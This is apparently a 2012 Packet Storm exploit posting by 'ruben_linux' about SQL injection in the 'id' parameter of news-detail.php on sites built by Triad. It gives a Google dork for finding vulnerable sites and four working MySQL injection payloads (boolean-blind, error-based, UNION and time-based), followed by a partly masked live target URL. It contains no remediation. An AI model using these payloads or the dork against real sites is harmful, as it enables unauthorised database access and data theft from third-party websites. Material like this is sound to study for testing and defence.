Website Created By Triad SQL Injection

2012-09-05T00:00:00
ID PACKETSTORM:116228
Type packetstorm
Reporter ruben_linux
Modified 2012-09-05T00:00:00

Description

                                        
                                            ` _ _ _  
_ __ _ _| |__ ___ _ __ | (_)_ __ _ ___ __  
| '__| | | | '_ \ / _ \ '_ \ | | | '_ \| | | \ \/ /  
| | | |_| | |_) | __/ | | | | | | | | | |_| |> <  
|_| \__,_|_.__/ \___|_| |_|___|_|_|_| |_|\__,_/_/\_\  
|_____|  
  
# Exploit Title: SQL Injection  
#  
# Google Dork: "Website Created and Hosted By Triad"  
#  
# Date: 5/9/12  
#  
# Author: ruben_linux  
#  
# Site : http://arealinux(dot)blogspot(dot)com(dot)es  
# http://www(dot)youtube(dot)com/user/rubenlinux  
==================================  
Files affected : news-detail.php  
parameter: id  
  
==================  
PoC-Exploit  
==================  
Place: GET  
Parameter: id  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: id=5' AND 6992=6992 AND 'kaiM'='kaiM  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause  
Payload: id=5' AND (SELECT 8596 FROM(SELECT  
COUNT(*),CONCAT(0x3a6974713a,(SELECT (CASE WHEN (8596=8596) THEN 1 ELSE 0  
END)),0x3a6a6c763a,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PzcT'='PzcT  
  
Type: UNION query  
Title: MySQL UNION query (NULL) - 7 columns  
Payload: id=5' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL,  
CONCAT(0x3a6974713a,0x4c6b50577255634a4c52,0x3a6a6c763a), NULL, NULL, NULL#  
  
Type: AND/OR time-based blind  
Title: MySQL > 5.0.11 AND time-based blind  
Payload: id=5' AND SLEEP(5) AND 'wZaG'='wZaG  
  
  
[+] http://www.******.com/news-detail.php?id=5[SQLi]  
`